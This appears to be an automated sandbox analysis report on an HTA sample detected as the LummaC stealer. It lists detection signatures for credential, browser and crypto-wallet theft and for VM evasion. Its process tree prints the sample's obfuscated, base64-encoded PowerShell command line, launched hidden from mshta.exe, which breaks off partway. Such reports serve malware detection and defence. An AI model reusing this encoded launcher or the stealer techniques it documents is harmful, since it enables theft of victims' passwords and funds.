Edit tour
Windows
Analysis Report
new-riii-1-b.pub.hta
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6232 cmdline:
mshta.exe "C:\Users\ user\Deskt op\new-rii i-1-b.pub. hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 1600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -Enc JABPAGUAQQ A2AFoARwA5 ADcAWgBEAG IANwBSAGgA aQBsAG0ARg A0ADkAWgBW ADIAQgBuAG 4AdQBDAHYA YgA2AFgAOQ ByAFcAZAAx AEIANgBFAG IANwBtADkA eAA5AHkAbw B2AFQAZABz AGsANwB4AF UASwBOAGwA TQAwAEkAWA BPAE8ANQBZ AGYAVABUAH MAZgBOAEMA QgBCADEAVQ BGAFQAdgBa ADgAZAB4AG sAUgBDAGsA MgBCAGcAYg BGAHEAVwBK AEYAZwBkAD UAaQBaADMA VgBQAFYANQ B2AEMAMgBE ADYAWgA3AD IANgBlAHQA MwBMADMAaA BEAEIAdQBU AFIARQB4AG YAOQAwAGYA ZgBiAFcAcg BSADUAVQA4 AFYAVQBUAF UAaABpAFcA UABZAGUAeQ BSADgAcQB6 AHQAUwA0AF IAUQBHAEoA RABXADIAcw BMAGkAcQB2 AGcAbABTAE cAcQBJADEA NQB2AE4ASw BWAEMAWAB5 AFEAZgBTAH YAcQBPAG4A YQAwAEQAVg BrAGIAYQAz AEIAcQBUAD IASABzADkA MABLAE8AdQ AzAFgANABH AEMANgBSAH oAYgB1AFcA ZgBZAEMAQQ BHAFgASABV AFAATQBnAG 8AQwBzAFIA RgBvAHkAag B1AGYAdwBU AGwAYgB2AG 0ANwBDAHcA MwBjAGgAUQ BPAG8AcwB1 AE0AYQB0AG MANQBDAHcA awBZAGMAZA BaAGEAYwBK ADcAZwBJAF AAbABXAHQA bwBTAGsAdA BEADkANgBl AE0AYwBuAF gAaAB5AFoA NQB5AHkARA BFAHIAOQBq AFEAagBxAE oAagA4AE4A ZQA0AGYAeA BHAGkAegBO AHkARgBBAE UAZQBNAFoA VwAwADMAUw BaAFoAZwB2 AFEAWQBqAG 0AcgB0AFUA VwBMADcAaw A3AFkAZABw ADQATABsAE 4AbwB4ADEA QwA4AFEAYg BmAE8AWQBv AFIAdgBXAH IAeABTAEsA QQBaADMAaQ BpAFoAcgBN AHgATABkAG cAeABZAGIA YQBiAEcAMQ BqAGsAMgB3 AHcAVgBqAE UAYQB5AE4A bABCADQAeQ AzAHkAWQAy AGUATwBMAE UARABSAEIA SwBXAFUATg BmAGQAbgBs AFIATgAzAE UASAAxAGEA aABiAFcANQ BQAEoAeQBY AEwAWgBsAF kAbwBJAHMA ZgBGAGcAQw BmAG4AaQA1 AGcAawBHAD EAOQB2AHEA QwBtAEwARQ BpAHUARQBM AGYAbQB4AH MARgBLAG8A NwBMAGkAYw BkAGUAOABB ADUANwBWAG oAeQBTAEYA YwBvAGwASg A5AHIAZABO AE8AUABKAG YAVgBNADkA egBvAEEAWQ BxAHUAdABa ADYAcQBxAE QAWgBXAHIA MgB0AEEAeg BuAEoAVQBh AEgAYQBKAG QAVwBaAHkA WQBmAG0Aeg BKAEoANAA1 ADYAWgByAG cAcABzAEQA cwBDAHYASQ B3AHMAYwBG AEEAbQA2AF YASABhAFQA aAA3AHUATA BaAG8AbgBj AGwAQgBUAF kAbQBSAFEA cABYAFkAbg BEAFUAQwBi AG8AbQBWAF IATABiAHQA UwA5AHcAbg BmAFYASgBR AE4ASQBKAG cAbQBZAEcA cAB5AE8ARg BPAFoANgBm AFAARQBNAE IAUwA5AG8A ZwBiAEgASA ByAHcAZgBx AFMAUgBIAD YATgBiAGEA OABmAEYAaw BSAGcARwB5 AGUAdgAwAH gAcQAxADEA VQBPAGgAVg A0AGgAUgA2 AFgAMQBnAD MAOQBrAFMA NwBBAFQAWQ BEAEgAaABl ADMAdABIAD YAQgBkAHIA VABDAEgAYw A2AE4AMgBh AGQAawBjAH UAeABoAHQA ZQBvAFIAZQ A2AGEAZgB6 ADUAVQBEAG 4AYgBnAE4A UQBLADkAcg BCAEsAMgBl AHUAZgA3AH IAcgBiAFgA NQB6AEQAcA ByADgAYgBU AEQATgBNAF kAYQBaAHoA cgBHADIAMw A3AHMAbgB6 AFoATgBIAE 4AVQBzAEgA YgB0AHgAVA B1ADAAagAx AFkASQBmAG IAWgBPAHIA cwA5AGwASg BxAE4AYwB5 AFYAeABrAG kAMgBUAEgA VAB4AEIANQ BaADcASgBB AE0AdwB5AD kAQgBsADUA UQBjAFcATg BBAGsAegA0 AGQAUQBiAH AAdwBlAGgA MwB3AFEAWg BGAFIAMABk AEsARwBvAE oAbgAgAD0A IAAkAGYAQQ BMAHMAZQAN AAoAJAA1AD AAcwBEADQA TgBzADMAbw BNADAAcgBQ AEUAMwA0AF cASgBvAEQA QgA1AHQAeA BnAEsATgBk ADIAcABwAG 0AOABVADMA VgBEADYAZw BuAHQAbgB1 AFUAYQBCAG gAUgBLAEkA